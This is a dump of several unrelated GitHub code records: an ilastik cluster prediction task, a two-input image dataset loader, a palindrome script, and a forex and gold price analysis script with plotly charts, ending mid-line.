CustomTag)\nadmin.site.register(Route,CustomRoute)\nadmin.site.register(RouteTag,CustomRouteTag)\n\n\n\n","repo_name":"TimoGronau/longboardboi","sub_path":"apps/route/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"650249837","text":"#! /usr/bin/python\n\nimport os\nimport sys\nimport json\n\nimport numpy as np\nimport luigi\nimport nifty.tools as nt\n\nimport cluster_tools.utils.volume_utils as vu\nimport cluster_tools.utils.function_utils as fu\nfrom cluster_tools.cluster_tasks import SlurmTask, LocalTask, LSFTask\n\ntry:\n import lazyflow\n from ilastik.experimental.api import from_project_file\n # set the number of threads used by ilastik to 0.\n # otherwise it does not work inside of the torch loader (and we want to limit number of threads anyways)\n # see https://github.com/ilastik/ilastik/issues/2517\n lazyflow.request.Request.reset_thread_pool(0)\nexcept ImportError:\n from_project_file = None\ntry:\n from xarray import DataArray\nexcept ImportError:\n DataArray = None\n\n\nclass PredictionBase(luigi.Task):\n \"\"\" Prediction base class\n \"\"\"\n\n task_name = \"prediction\"\n src_file = os.path.abspath(__file__)\n allow_retry = False\n\n input_path = luigi.Parameter()\n input_key = luigi.Parameter()\n output_path = luigi.Parameter()\n output_key = luigi.Parameter()\n mask_path = luigi.Parameter(default=\"\")\n mask_key = luigi.Parameter(default=\"\")\n ilastik_project = luigi.Parameter()\n halo = luigi.ListParameter()\n out_channels = luigi.ListParameter(default=None)\n\n @staticmethod\n def default_task_config():\n # we use this to get also get the common default config\n config = LocalTask.default_task_config()\n config.update({\"dtype\": \"float32\"})\n return config\n\n # would be nice to get this directly from the ilastik project instead\n # of running inference once, see also\n # https://github.com/ilastik/ilastik/issues/2530\n def get_out_channels(self, input_shape, input_channels):\n ilp = from_project_file(self.ilastik_project)\n dims = (\"z\", \"y\", \"x\")\n if input_channels is not None:\n input_shape = (input_channels,) + input_shape\n dims = (\"c\",) + dims\n input_ = np.random.rand(*input_shape).astype(\"float32\")\n input_ = DataArray(input_, dims=dims)\n pred = ilp.predict(input_)\n n_out_channes = pred.shape[-1]\n return list(range(n_out_channes))\n\n def run_impl(self):\n assert from_project_file is not None\n assert DataArray is not None\n # get the global config and init configs\n shebang, block_shape, roi_begin, roi_end = self.global_config_values()\n self.init(shebang)\n\n # load the task config\n config = self.get_task_config()\n shape = vu.get_shape(self.input_path, self.input_key)\n if len(shape) == 4:\n in_channels = shape[0]\n shape = shape[1:]\n else:\n in_channels = None\n assert len(shape) == 3\n block_list = vu.blocks_in_volume(shape, block_shape, roi_begin, roi_end)\n\n out_channels = self.out_channels\n if out_channels is None:\n out_channels = self.get_out_channels(block_shape, in_channels)\n\n # create the output dataset\n chunks = tuple(bs // 2 for bs in block_shape)\n n_channels = len(out_channels)\n if n_channels > 1:\n shape = (n_channels,) + shape\n chunks = (1,) + chunks\n dtype = config.get(\"dtype\", \"float32\")\n with vu.file_reader(self.output_path) as f:\n f.require_dataset(self.output_key, shape=shape, chunks=chunks, dtype=dtype, compression=\"gzip\")\n\n # update the config with input and output paths and keys\n # as well as block shape\n config.update({\"input_path\": self.input_path, \"input_key\": self.input_key,\n \"output_path\": self.output_path, \"output_key\": self.output_key,\n \"halo\": self.halo, \"ilastik_project\": self.ilastik_project,\n \"out_channels\": out_channels, \"block_shape\": block_shape})\n if self.mask_path != \"\":\n assert self.mask_key != \"\"\n config.update({\"mask_path\": self.mask_path, \"mask_key\": self.mask_key})\n\n n_jobs = min(len(block_list), self.max_jobs)\n # prime and run the jobs\n self.prepare_jobs(n_jobs, block_list, config)\n self.submit_jobs(n_jobs)\n\n # wait till jobs finish and check for job success\n self.wait_for_jobs()\n self.check_jobs(n_jobs)\n\n\nclass PredictionLocal(PredictionBase, LocalTask):\n \"\"\" Prediction on local machine\n \"\"\"\n pass\n\n\nclass PredictionSlurm(PredictionBase, SlurmTask):\n \"\"\" Prediction on slurm cluster\n \"\"\"\n pass\n\n\nclass PredictionLSF(PredictionBase, LSFTask):\n \"\"\" Prediction on lsf cluster\n \"\"\"\n pass\n\n\n# TODO implement more dtype conversion\ndef _to_dtype(input_, dtype):\n idtype = input_.dtype\n if np.dtype(dtype) == idtype:\n return input_\n elif dtype == \"uint8\":\n input_ *= 255.\n return input_.astype(\"uint8\")\n else:\n raise NotImplementedError(dtype)\n\n\ndef _pad_if_necessary(data, shape):\n if data.shape == shape:\n return data, None\n pad_width = []\n crop = []\n for dsh, sh in zip(data.shape, shape):\n if dsh == sh:\n pad_width.append((0, 0))\n crop.append(slice(None))\n else:\n assert sh > dsh\n pad_width.append((0, sh - dsh))\n crop.append(slice(0, dsh))\n data = np.pad(data, pad_width)\n assert data.shape == shape\n return data, tuple(crop)\n\n\ndef _predict_block(block_id, blocking, ilp, ds_in, ds_out, ds_mask, halo, out_channels):\n fu.log(\"Start processing block %i\" % block_id)\n block = blocking.getBlockWithHalo(block_id, halo)\n bb = vu.block_to_bb(block.outerBlock)\n\n # check if there is any data to be processed, if we have a mask\n if ds_mask is not None:\n bb_mask = ds_mask[bb].astype(\"bool\")\n if np.sum(bb_mask) == 0:\n fu.log_block_success(block_id)\n return\n\n dims = (\"z\", \"y\", \"x\")\n if ds_in.ndim == 4:\n bb = (slice(None),) + bb\n dims = (\"c\",) + dims\n input_ = ds_in[bb]\n\n # we need to pad to the full size for border chunks, because otherwise some filters may not be valid\n full_block_shape = tuple(sh + 2*ha for sh, ha in zip(blocking.blockShape, halo))\n input_, crop = _pad_if_necessary(input_, full_block_shape)\n\n # if we have a mask should set it as prediction mask in ilastik\n # (currently not supported by ilastik)\n pred = ilp.predict(DataArray(input_, dims=dims)).values\n if crop is not None:\n pred = pred[crop]\n\n inner_bb = vu.block_to_bb(block.innerBlockLocal)\n inner_bb = inner_bb + (tuple(out_channels),)\n pred = pred[inner_bb]\n if pred.shape[-1] == 1:\n pred = pred[..., 0]\n else:\n pred = pred.transpose((3, 0, 1, 2))\n pred = _to_dtype(pred, ds_out.dtype)\n assert pred.ndim in (3, 4)\n\n bb = vu.block_to_bb(block.innerBlock)\n if pred.ndim == 4:\n bb = (slice(None),) + bb\n ds_out[bb] = pred\n fu.log_block_success(block_id)\n\n\ndef prediction(job_id, config_path):\n\n fu.log(\"start processing job %i\" % job_id)\n fu.log(\"reading config from %s\" % config_path)\n\n # get the config\n with open(config_path, \"r\") as f:\n config = json.load(f)\n\n input_path = config[\"input_path\"]\n input_key = config[\"input_key\"]\n halo = config[\"halo\"]\n ilastik_project = config[\"ilastik_project\"]\n\n output_path = config[\"output_path\"]\n output_key = config[\"output_key\"]\n out_channels = config[\"out_channels\"]\n\n assert os.path.exists(ilastik_project), ilastik_project\n assert os.path.exists(input_path)\n\n block_shape = config[\"block_shape\"]\n block_list = config[\"block_list\"]\n shape = vu.get_shape(input_path, input_key)\n if len(shape) == 4:\n shape = shape[1:]\n blocking = nt.blocking([0, 0, 0], shape, block_shape)\n\n ilp = from_project_file(ilastik_project)\n fu.log(\"start ilastik prediction\")\n with vu.file_reader(input_path, \"r\") as f_in, vu.file_reader(output_path, \"a\") as f_out:\n ds_in = f_in[input_key]\n ds_out = f_out[output_key]\n\n if \"mask_path\" in config:\n mask_path, mask_key = config[\"mask_path\"], config[\"mask_key\"]\n fu.log(\"Load mask from %s:%s\" % (mask_path, mask_key))\n mask = vu.load_mask(mask_path, mask_key, shape)\n fu.log(\"Have loaded mask\")\n else:\n mask = None\n\n for block_id in block_list:\n _predict_block(block_id, blocking, ilp, ds_in, ds_out, mask, halo, out_channels)\n\n fu.log_job_success(job_id)\n\n\nif __name__ == \"__main__\":\n path = sys.argv[1]\n assert os.path.exists(path), path\n job_id = int(os.path.split(path)[1].split(\".\")[0].split(\"_\")[-1])\n prediction(job_id, path)\n","repo_name":"constantinpape/cluster_tools","sub_path":"cluster_tools/ilastik/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":8686,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"6"} +{"seq_id":"24167553314","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nimport random\n\nimport sys, os\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom TwoInputDistortion import Distortion\nimport utils\n\nclass TwoInputDataset():\n \"\"\"\n 読み込むtxtファイルは,\n class_number\n class_number\n みたいに記述しておく.\n \"\"\"\n def __init__(self, **kwargs):\n self.train_path_c = [] ## cropped images\n self.train_path_o = [] ## full size images\n self.train_label_c = [] # [[0,0,0,1,0,0,0,0,0],...] みたいな感じ (1-of-k)\n self.test_path_c = []\n self.test_path_o = []\n self.test_label_c = []\n self.image_size = kwargs[\"image_size\"]\n self.num_classes = kwargs[\"num_classes\"]\n self.distortion = Distortion(gamma=2)\n\n\n def getPathandLabel(path, num_classes): # パスとラベルを取得する\n with open(path, 'r') as f:\n f_ = [line.rstrip().split() for line in f]\n image_paths = [l[0] for l in f_]\n\n labels = [] # 1-of-kで用意する\n for l in f_:\n tmp = [0]*num_classes\n tmp[int(l[1])] = 1\n labels.append(tmp) \n\n return image_paths, labels\n\n # if train & test\n if len(kwargs) == 6 and kwargs[\"train_c\"] is not None and kwargs[\"train_o\"] is not None and kwargs[\"test_c\"] is not None and kwargs[\"test_o\"] is not None:\n train_c = kwargs[\"train_c\"]\n train_o = kwargs[\"train_o\"]\n test_c = kwargs[\"test_c\"]\n test_o = kwargs[\"test_o\"]\n\n self.train_path_c, self.train_label_c = getPathandLabel(train_c, self.num_classes)\n self.train_path_o, _ = getPathandLabel(train_o, self.num_classes)\n self.test_path_c, self.test_label_c = getPathandLabel(test_c, self.num_classes)\n self.test_path_o, _ = getPathandLabel(test_o, self.num_classes)\n\n #numpyにしておく\n self.train_label_c = np.asarray(self.train_label_c)\n self.test_label_c = np.asarray(self.test_label_c)\n\n # if only test\n elif len(kwargs) == 4 and kwargs[\"test_c\"] is not None and kwargs[\"test_o\"] is not None:\n # 引数\n test_c = kwargs[\"test_c\"]\n test_o= kwargs[\"test_o\"]\n\n self.test_path_c, self.test_label_c = getPathandLabel(test_c, self.num_classes)\n self.test_path_o, _ = getPathandLabel(test_o, self.num_classes)\n\n #numpyにしておく\n self.test_label_c = np.asarray(self.test_label_c)\n\n else:\n print(\"Dasaset initializer args error. (need 4 or 6 args)\")\n sys.exit()\n\n def shuffle(self):\n # shuffle (dataとlabelの対応が崩れないように)\n def shuffle_data(paths_c, paths_o, labels):\n indexl = [i for i in range(len(paths_c))]\n shuffled_indexl = list(indexl)\n random.shuffle(shuffled_indexl)\n\n shuffled_c = paths_c\n shuffled_o = paths_o\n shuffled_labels = labels\n\n for i, (path_c, path_o, label) in enumerate(zip(paths_c, paths_o, labels)):\n shuffled_c[shuffled_indexl[i]] = path_c\n shuffled_o[shuffled_indexl[i]] = path_o\n shuffled_labels[shuffled_indexl[i]] = label\n\n return shuffled_c, shuffled_o, shuffled_labels\n\n if self.train_path_c:# 空じゃなければ\n self.train_path_c, self.train_path_o, self.train_label_c = shuffle_data(self.train_path_c, self.train_path_o, self.train_label_c)\n\n if self.test_path_c:\n self.test_path_c, self.test_path_o, self.test_path_c = shuffle_data(self.test_path_c, self.test_path_o, self.test_path_c)\n\n # # indexの対応関係が破壊されてないかの確認\n # for i, (test1, test2, label) in enumerate(zip(self.test_path_c, self.test_path_o, self.test_path_c)):\n # print(i, test1, test2, label)\n\n def getBatch(self, batchsize, index, mode='train'):\n if mode == 'train':\n pathsA = self.train_path_c\n pathsB = self.train_path_o\n labels = self.train_label_c\n else:\n pathsA = self.test_path_c\n pathsB = self.test_path_o\n labels = self.test_label_c\n\n batchA = []\n batchB = []\n start = batchsize * index\n end = start + batchsize\n\n for i, (pathA, pathB) in enumerate(zip(pathsA[start:end], pathsB[start:end])):\n # pathB = pathsB[start+i]\n\n # imageA = cv2.imread(pathA)\n # imageB = cv2.imread(pathB)\n\n # # cv2.imread()はBGR\n imageA = np.array(Image.open(pathA)) / 255\n imageB = np.array(Image.open(pathB)) / 255\n #\n #\n # # imageA, imageB = self.distortion.distort(images=[imageA, imageB], flag=mode, p=1.0)\n #\n #imageA = cv2.resize(padding(imageA), (self.image_size, self.image_size))\n imageA = cv2.resize(imageA, (self.image_size, self.image_size))\n #imageB = cv2.resize(padding(imageB), (self.image_size, self.image_size))\n imageB = cv2.resize(imageB, (self.image_size, self.image_size))\n # imageA = utils.load_image(pathA, normalize=True)\n # imageB = utils.load_image(pathB, normalize=True)\n\n # batchA.append(imageA.astype(np.float32)/255.0)\n # batchB.append(imageB.astype(np.float32)/255.0)\n batchA.append(imageA)\n batchB.append(imageB)\n\n # batchA.append(imageA.flatten().astype(np.float32) / 255.0)\n # batchB.append(imageB.flatten().astype(np.float32) / 255.0)\n\n batchA = np.asarray(batchA)\n batchB = np.asarray(batchB)\n label_batch = labels[start:end]\n\n return {'batch': batchA, 'path': pathsA[start:end]}, {'batch': batchB, 'path': pathsB[start:end]}, label_batch\n\n def getTrainBatch(self, batchsize, index):\n return self.getBatch(batchsize, index, mode='train')\n\n\n def getTestData(self, batchsize, index=0):\n return self.getBatch(batchsize, index, mode='test')\n\ndef padding(image):\n # アス比の違う画像をゼロパディングして正方形にする\n w = image.shape[1]\n h = image.shape[0]\n if w == h:\n return image\n elif w > h:\n offset = w - h\n n = int(offset / 2)\n if offset % 2 == 0:\n dst = np.pad(image, [(n, n), (0, 0), (0, 0)], 'constant')\n else:\n dst = np.pad(image, [(n, n+1), (0, 0), (0, 0)], 'constant')\n return dst\n\n else:\n offset = h - w\n n = int(offset / 2)\n if offset % 2 == 0:\n dst = np.pad(image, [(0, 0), (n, n), (0, 0)], 'constant')\n else:\n dst = np.pad(image, [(0, 0), (n, n+1), (0, 0)], 'constant')\n return dst\n\nif __name__ == '__main__':\n # # test code\n # dataset = TwoInputDataset(train_c='/Users/shigetomi/Desktop/dataset_walls/train2.txt',\n # train_o='/Users/shigetomi/Desktop/dataset_walls/train1.txt',\n # test_c='/Users/shigetomi/Desktop/dataset_walls/test2.txt',\n # test_o='/Users/shigetomi/Desktop/dataset_walls/test1.txt',\n # num_classes=6,\n # image_size=229)\n # dataset.shuffle()\n # cropped_batch, orig_batch, labels = dataset.getTrainBatch(batchsize=5, index=0)\n # cropped_test_batch, orig_test_batch, test_labels = dataset.getTestData(batchsize=5)\n #\n # # check image\n # for i,(c, o, l) in enumerate(zip(cropped_batch['batch'], orig_batch['batch'], labels)):\n # print(i, cropped_batch['path'][i], '\\n ', orig_batch['path'][i], '\\n class:', np.where(l == 1)[0][0])\n # cv2.imshow(\"c\", c)\n # cv2.imshow(\"o\", o)\n # cv2.waitKey(0)\n\n # padding test\n image = np.array(Image.open(\"/Users/shigetomi/Desktop/dataset_GOR/cat/cat_cropped/image_0012.jpg\")) / 255\n dst = cv2.resize(padding(image), (224, 224))\n print(\"image:\", image)\n print(\"dst\", dst)\n cv2.imshow(\"dst\", dst)\n cv2.imshow(\"org\", image)\n cv2.waitKey(0)\n","repo_name":"shigenius/tensorflow_works","sub_path":"tf-slim/TwoInputDataset.py","file_name":"TwoInputDataset.py","file_ext":"py","file_size_in_byte":8303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30313918173","text":"def rev(x):\n rev=0\n while x>0:\n r=x%10\n rev=rev*10+r\n x=x//10\n return rev\nx=int(input())\nwhile True:\n x=x+rev(x)\n if x==rev(x):\n print(x)\n break","repo_name":"Seethanveshi/codemind-python","sub_path":"Reverse_Palindrome.py","file_name":"Reverse_Palindrome.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22175866604","text":"# Author:Zhang Yuan\nfrom MyPackage import *\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport seaborn as sns\nimport statsmodels.api as sm\nfrom scipy import stats\n\n# ------------------------------------------------------------\n__mypath__ = MyPath.MyClass_Path(\"\") # 路径类\nmylogging = MyDefault.MyClass_Default_Logging(activate=False) # 日志记录类,需要放在上面才行\nmyfile = MyFile.MyClass_File() # 文件操作类\nmyword = MyFile.MyClass_Word() # word生成类\nmyexcel = MyFile.MyClass_Excel() # excel生成类\nmyini = MyFile.MyClass_INI() # ini文件操作类\nmytime = MyTime.MyClass_Time() # 时间类\nmyparallel = MyTools.MyClass_ParallelCal() # 并行运算类\nmyplt = MyPlot.MyClass_Plot() # 直接绘图类(单个图窗)\nmypltpro = MyPlot.MyClass_PlotPro() # Plot高级图系列\nmyfig = MyPlot.MyClass_Figure(AddFigure=False) # 对象式绘图类(可多个图窗)\nmyfigpro = MyPlot.MyClass_FigurePro(AddFigure=False) # Figure高级图系列\nmyplthtml = MyPlot.MyClass_PlotHTML() # 画可以交互的html格式的图\nmypltly = MyPlot.MyClass_Plotly() # plotly画图相关\nmynp = MyArray.MyClass_NumPy() # 多维数组类(整合Numpy)\nmypd = MyArray.MyClass_Pandas() # 矩阵数组类(整合Pandas)\nmypdpro = MyArray.MyClass_PandasPro() # 高级矩阵数组类\nmyDA = MyDataAnalysis.MyClass_DataAnalysis() # 数据分析类\nmyDefault = MyDefault.MyClass_Default_Matplotlib() # 画图恢复默认设置类\n# myMql = MyMql.MyClass_MqlBackups() # Mql备份类\n# myBaidu = MyWebCrawler.MyClass_BaiduPan() # Baidu网盘交互类\n# myImage = MyImage.MyClass_ImageProcess() # 图片处理类\nmyBT = MyBackTest.MyClass_BackTestEvent() # 事件驱动型回测类\nmyBTV = MyBackTest.MyClass_BackTestVector() # 向量型回测类\nmyML = MyMachineLearning.MyClass_MachineLearning() # 机器学习综合类\nmySQL = MyDataBase.MyClass_MySQL(connect=False) # MySQL类\nmySQLAPP = MyDataBase.MyClass_SQL_APPIntegration() # 数据库应用整合\nmyWebQD = MyWebCrawler.MyClass_QuotesDownload(tushare=False) # 金融行情下载类\nmyWebR = MyWebCrawler.MyClass_Requests() # Requests爬虫类\nmyWebS = MyWebCrawler.MyClass_Selenium(openChrome=False) # Selenium模拟浏览器类\nmyWebAPP = MyWebCrawler.MyClass_Web_APPIntegration() # 爬虫整合应用类\nmyEmail = MyWebCrawler.MyClass_Email() # 邮箱交互类\nmyReportA = MyQuant.MyClass_ReportAnalysis() # 研报分析类\nmyFactorD = MyQuant.MyClass_Factor_Detection() # 因子检测类\nmyKeras = MyDeepLearning.MyClass_tfKeras() # tfKeras综合类\nmyTensor = MyDeepLearning.MyClass_TensorFlow() # Tensorflow综合类\nmyMT5 = MyMql.MyClass_ConnectMT5(connect=False) # Python链接MetaTrader5客户端类\nmyMT5Pro = MyMql.MyClass_ConnectMT5Pro(connect=False) # Python链接MT5高级类\nmyMT5Indi = MyMql.MyClass_MT5Indicator() # MT5指标Python版\nmyMT5Report = MyMT5Report.MyClass_StratTestReport(AddFigure=False) # MT5策略报告类\nmyMT5Analy = MyMT5Analysis.MyClass_ForwardAnalysis() # MT5分析类\nmyMT5Lots_Fix = MyMql.MyClass_Lots_FixedLever(connect=False) # 固定杠杆仓位类\nmyMT5Lots_Dy = MyMql.MyClass_Lots_DyLever(connect=False) # 浮动杠杆仓位类\nmyMT5run = MyMql.MyClass_RunningMT5() # Python运行MT5\nmyMT5code = MyMql.MyClass_CodeMql5() # Python生成MT5代码\nmyMoneyM = MyTrade.MyClass_MoneyManage() # 资金管理类\nmyDefault.set_backend_default(\"Pycharm\") # Pycharm下需要plt.show()才显示图\n# ------------------------------------------------------------\n# Jupyter Notebook 控制台显示必须加上:%matplotlib inline ,弹出窗显示必须加上:%matplotlib auto\n# %matplotlib inline\n# import warnings\n# warnings.filterwarnings('ignore')\n\n# %%\nimport warnings\nwarnings.filterwarnings('ignore')\n# 简介\n# 外汇是一个大型的全球市场,允许人们进行货币之间的交易。作为世界上最大的市场,它拥有单日近7万亿美元的交易量。随着人工智能和机器学习的普及,许多人试图预测未来的货币价格,然而,许多人几乎没有成功。\n# 预测金融市场类似于预测未来。由于有这么多未知和不可预测的因素,建立一个机器学习模型来预测未来事件的发生实在是太不可能了(就目前而言)。因此,本笔记本没有试图预测未来的价格,而是对货币市场进行了简单的分析(只分析了一些货币对),它与更广泛的市场的相关性,也许还有我们最近观察到的一些趋势。\n\n# 在本节中,我们将对我们的数据做一个简单的分析,这可能有助于我们以后的数据探索。\n\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python Docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load\n\nimport numpy as np\nimport pandas as pd\nimport os\nfrom datetime import datetime\n\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\nimport plotly.express as px\n\nfrom plotly.subplots import make_subplots\nfrom plotly.graph_objs import Line\n\nfrom scipy import stats\nimport seaborn as sns\n\n# Data Paths\n# Data Paths\ndaily_eurusd_df = myMT5Pro.getsymboldata(\"EURUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nxau_eur_df = myMT5Pro.getsymboldata(\"XAUEUR\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nxau_usd_df = myMT5Pro.getsymboldata(\"XAUUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\noil_df = myMT5Pro.getsymboldata(\"XTIUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nusd_index_df = myMT5Pro.getsymboldata(\"USDX.index\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nus_interest_rates = None\ngold_prices_df = myMT5Pro.getsymboldata(\"XAUUSD\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\ndaily_usdjpy_df = myMT5Pro.getsymboldata(\"USDJPY\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\nvix_df = None\nsnp_500_df = myMT5Pro.getsymboldata(\"US500\", \"TIMEFRAME_D1\", [2000,1,1,0,0,0], [2024,1,1,0,0,0], index_time=True,col_capitalize=True)\n\n#%%\n# Renaming Columns For Merging Later on\ndaily_eurusd_df.rename(columns = {'Close' : 'EURUSD_Price', 'Open' : 'EURUSD_Open', \"High\":\"EURUSD_High\", \"Low\":\"EURUSD_Low\", \"Rate\":\"EURUSD_Change%\"}, inplace = True)\nxau_usd_df.rename(columns = {'Close' : 'XAUUSD_Price', 'Open' : 'XAUUSD_Open', \"High\":\"XAUUSD_High\", \"Low\":\"XAUUSD_Low\", \"Rate\":\"XAUUSD_Change%\"}, inplace = True)\nxau_eur_df.rename(columns = {'Close' : 'XAUEUR_Price', 'Open' : 'XAUEUR_Open', \"High\":\"XAUEUR_High\", \"Low\":\"XAUEUR_Low\", \"Rate\":\"XAUEUR_Change%\"}, inplace = True)\n\n\ndef modify_datetime(df_column):\n \"\"\"\n Changes Date Format from Feb 08, 2020 --> 08/02/2020 [dd/mm/YYYY]\n \"\"\"\n df_column[\"Time\"] = df_column[\"Time\"].apply(lambda x: x.strftime(\"%d/%m/%Y\"))\n # df_column[\"Time\"] = df_column[\"Time\"].apply(lambda x:datetime.strptime(x.lower().replace(\",\", \"\"), \"%b %d %Y\").strftime(\"%d/%m/%Y\"))\n return df_column[\"Time\"]\n\n\ndef remove_comma(df_column, column_name):\n \"\"\"\n Removes Comma from Prices E.g [1,234,234 --> 1234234]\n \"\"\"\n try:\n df_column[column_name] = df_column[column_name].apply(lambda x: x.replace(\",\", \"\"))\n return df_column[column_name]\n except:\n return df_column[column_name]\n\n\ndaily_eurusd_df[\"Date\"] = modify_datetime(df_column=daily_eurusd_df)\nprint(\"No. of Data Points (EURUSD) :\", len(daily_eurusd_df))\n\nxau_usd_df[\"Date\"] = modify_datetime(xau_usd_df)\nprint(\"No. of Data Points (XAUUSD) :\", len(xau_usd_df))\n\nxau_eur_df[\"Date\"] = modify_datetime(xau_eur_df)\nprint(\"No. of Data Points (XAUEUR) :\", len(xau_eur_df))\n\n\n# Merging all the Dataframes together\nmerge_df = pd.merge(daily_eurusd_df, xau_usd_df, how=\"outer\", on=\"Date\")\nmerge_df = pd.merge(merge_df, xau_eur_df, how=\"outer\", on=\"Date\")\n# Re-Fromatting Dataframe\nmerge_df.dropna(inplace=True)\nmerge_df = merge_df[::-1].reset_index()\ndel merge_df[\"index\"]\n# Removes Commas from Columns we need\nmerge_df[\"XAUUSD_Price\"] = remove_comma(merge_df, \"XAUUSD_Price\")\nmerge_df[\"XAUEUR_Price\"] = remove_comma(merge_df, \"XAUEUR_Price\")\n# Make an archive/copyy of the original dataframe\n_merge_df = merge_df.copy()\n\n\n#%% Statistics\n\"\"\"Mean Price\"\"\"\n\nmean_eurusd = merge_df[\"EURUSD_Price\"].mean()\nmean_xauusd = merge_df[\"XAUUSD_Price\"].astype(np.float).mean()\nmean_xaueur = merge_df[\"XAUEUR_Price\"].astype(np.float).mean()\n\n\n\"\"\"众数 Mode Price\"\"\"\n\nmode_eurusd = merge_df[\"EURUSD_Price\"].mode().tolist()\nmode_xauusd = merge_df[\"XAUUSD_Price\"].mode().astype(float).tolist()\nmode_xaueur = merge_df[\"XAUEUR_Price\"].mode().astype(float).tolist()\n\n\n\"\"\"Plotting Candlestick Graphs with Mean and Mode Values\"\"\"\n\nfig = go.Figure(data=[go.Candlestick(x=merge_df['Date'],\n open=merge_df['EURUSD_Open'],\n high=merge_df['EURUSD_High'],\n low=merge_df['EURUSD_Low'],\n close=merge_df['EURUSD_Price'],\n name=\"Candlestick Graph\")])\n\nfor i in mode_eurusd:\n x = np.array([\"02/01/2014\", \"08/02/2021\"])\n y = np.array([i, i])\n fig.add_trace(go.Scatter(x=x, y=y, name=\"Mode Value(s)\",mode='lines'))\n\nx = np.array([\"02/01/2014\", \"08/02/2021\"])\ny = np.array([mean_eurusd, mean_eurusd])\nfig.add_trace(go.Scatter(x=x, y=y, name=\"Mean Value\",line=dict(color='red', width=1.5, dash='dot')))\n\nfig.update_layout(showlegend=True)\nfig.update_layout(xaxis_rangeslider_visible=False)\nfig.update_layout(height=600, width=1000, title_text=\"EURUSD Chart\")\n\nfig.show()\nprint(\"Mean EURUSD Price (Jan 2014 - Feb 2021) :\", round(mean_eurusd, 4))\nprint(\"Mode EURUSD Price(s) (Jan 2014 - Feb 2021) :\", mode_eurusd)\nmypltly.plot_on_webpage(fig)\n\n#%%\n# Overview of Data\nsns.displot(merge_df['EURUSD_Price'])\n\n\"\"\"\nSkewness is a measure of the symmetrical nature of data. \nKurtosis is a measure of how heavy-tailed or light-tailed the data is relative to a normal distribution.\n\"\"\"\nprint(\"Skewness: %f\" % merge_df['EURUSD_Price'].skew())\nprint(\"Kurtosis: %f\" % merge_df['EURUSD_Price'].kurt())\nplt.show()\n\n#%% Data Exploration\n# 货币强度与黄金的关系\n# 货币强度经常被用作辅助交易的指标。然而,有许多方法来定义货币的强度。一些可用的开源货币强度表测量每种货币相对于美元的强度,然后对主要货币对进行相应排名。由于美元的影响很大,因此美国发生的事件的影响也更大,这对货币强度的看法更加偏颇。例如,澳元兑美元的上涨并不一定意味着澳元的改善,而可能是美国正在发生的负面的基本面变化。因此,我们必须避免使用其他货币作为衡量货币强度的标准。\n# 也许从黄金的角度看货币,可以提供一个不太偏颇的货币强度前景。在本节中,我们看一下欧元/美元与黄金的货币强势有多密切相关。\nfig = go.Figure(data=[go.Candlestick(x=merge_df['Date'],\n open=merge_df['XAUUSD_Open'],\n high=merge_df['XAUUSD_High'],\n low=merge_df['XAUUSD_Low'],\n close=merge_df['XAUUSD_Price'],\n name=\"Candlestick Graph\")])\n\nfor i in mode_xauusd:\n x = np.array([\"02/01/2014\", \"08/02/2021\"])\n y = np.array([i, i])\n fig.add_trace(go.Scatter(x=x, y=y, name=\"Mode Value(s)\",mode='lines'))\n\nx = np.array([\"02/01/2014\", \"08/02/2021\"])\ny = np.array([mean_xauusd, mean_xauusd])\nfig.add_trace(go.Scatter(x=x, y=y, name=\"Mean Value\",line=dict(color='red', width=1.5, dash='dot')))\n\nfig.update_layout(showlegend=True)\nfig.update_layout(xaxis_rangeslider_visible=False)\nfig.update_layout(height=600, width=1000, title_text=\"XAUUSD Chart\")\n\nfig.show()\nprint(\"Mean XAUUSD Price (Jan 2014 - Feb 2021) :\", round(mean_xauusd, 2))\nprint(\"Mode XAUUSD Price(s) (Jan 2014 - Feb 2021) :\", mode_xauusd)\nmypltly.plot_on_webpage(fig)\n\n\nfig = go.Figure(data=[go.Candlestick(x=merge_df['Date'],\n open=merge_df['XAUEUR_Open'],\n high=merge_df['XAUEUR_High'],\n low=merge_df['XAUEUR_Low'],\n close=merge_df['XAUEUR_Price'],\n name=\"Candlestick Graph\")])\n\nfor i in mode_xaueur:\n x = np.array([\"02/01/2014\", \"08/02/2021\"])\n y = np.array([i, i])\n fig.add_trace(go.Scatter(x=x, y=y, name=\"Mode Value(s)\",mode='lines'))\n\nx = np.array([\"02/01/2014\", \"08/02/2021\"])\ny = np.array([mean_xaueur, mean_xaueur])\nfig.add_trace(go.Scatter(x=x, y=y, name=\"Mean Value\",line=dict(color='red', width=1.5, dash='dot')))\n\nfig.update_layout(showlegend=True)\nfig.update_layout(xaxis_rangeslider_visible=False)\nfig.update_layout(height=600, width=1000, title_text=\"XAUEUR Chart\")\n\nfig.show()\nprint(\"Mean XAUEUR Price (Jan 2014 - Feb 2021) :\", round(mean_xaueur, 